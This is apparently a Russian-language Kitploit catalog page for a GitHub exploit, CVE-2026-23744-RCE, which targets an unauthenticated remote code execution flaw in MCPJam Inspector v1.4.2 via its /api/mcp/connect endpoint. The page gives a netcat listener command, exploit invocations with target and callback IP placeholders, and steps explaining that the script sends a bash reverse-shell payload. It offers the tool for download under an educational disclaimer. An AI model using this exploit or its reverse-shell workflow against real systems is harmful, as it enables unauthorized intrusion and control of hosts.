Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-23744-RCE — Эта утилита была создана в ходе исследования, связанного с MCPJam v1.4.2. Приложение предоставляет конечную точку API, которая принимает объект конфигурации сервера. При определенных условиях недостаточная валидация может привести к непреднамеренному выполнению команд. | Kitploit
Инструменты/GitHubGitHub/alisster00/cve-2026-23744-rce
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеИнструмент Удаленного Доступа
GitHubalisster00/cve-2026-23744-rce

CVE-2026-23744-RCE

Эта утилита была создана в ходе исследования, связанного с MCPJam v1.4.2. Приложение предоставляет конечную точку API, которая принимает объект конфигурации сервера. При определенных условиях недостаточная валидация может привести к непреднамеренному выполнению команд.

Репозиторий
113 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

MCPJam Inspector v1.4.2 - Эксплойт RCE

Описание уязвимости

MCPJam Inspector содержит неаутентифицированную уязвимость удаленного выполнения кода (RCE) в конечной точке /api/mcp/connect. Уязвимость позволяет злоумышленникам выполнять произвольные команды, отправляя вредоносную полезную нагрузку конфигурации MCP-сервера.

Конечная точка принимает JSON-полезную нагрузку с объектом serverConfig, содержащим command и массив args, которые выполняются непосредственно в системе без надлежащей проверки или очистки.

Затронутые версии

  • MCPJam Inspector v1.4.2 и, вероятно, более ранние версии

Использование

Предварительные требования

  • Python 3.6+
  • библиотека requests: pip install requests
  • netcat или socat для слушателя

Быстрый старт

Терминал 1 - Запуск слушателя:

root@kitploit:~
nc -lvnp 4444

Терминал 2 - Запуск эксплойта:

root@kitploit:~
python3 script.py <TARGET_IP> -l <YOUR_IP> --lport 4444

Примеры

root@kitploit:~
# По умолчанию (порт 6274, порт обратного вызова 4444)
python3 script.py <TARGET_IP> -l <YOUR_IP>

# Пользовательский порт MCPJam
python3 script.py <TARGET_IP> -p 6274 -l <YOUR_IP>

# Пользовательский порт слушателя
python3 script.py <TARGET_IP> -l <YOUR_IP> --lport 5555

Как это работает

  1. Скрипт проверяет, доступен ли MCPJam на цели
  2. Формирует вредоносную полезную нагрузку MCP-сервера с обратной оболочкой bash
  3. Отправляет полезную нагрузку в конечную точку /api/mcp/connect
  4. MCPJam обрабатывает команду и инициирует обратный вызов оболочки
  5. Пользователь получает интерактивную оболочку на слушателе

Отказ от ответственности

⚠️ ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ:

Данный эксплойт предоставляется только для образовательных целей и авторизованного тестирования безопасности. Несанкционированный доступ к компьютерным системам незаконен. Пользователи несут единоличную ответственность за:

  • Получение надлежащего разрешения перед тестированием любых систем
  • Соблюдение всех применимых законов и нормативных актов
  • Любой ущерб или юридические последствия, возникшие в результате неправильного использования

Автор не несет ответственности за неправильное использование или ущерб, причиненный данным инструментом. Используйте на свой страх и риск.

Технические детали

  • Уязвимая конечная точка: /api/mcp/connect
  • Метод: POST
  • Аутентификация: Не требуется
  • Воздействие: Неаутентифицированное удаленное выполнение команд
Скачать инструмент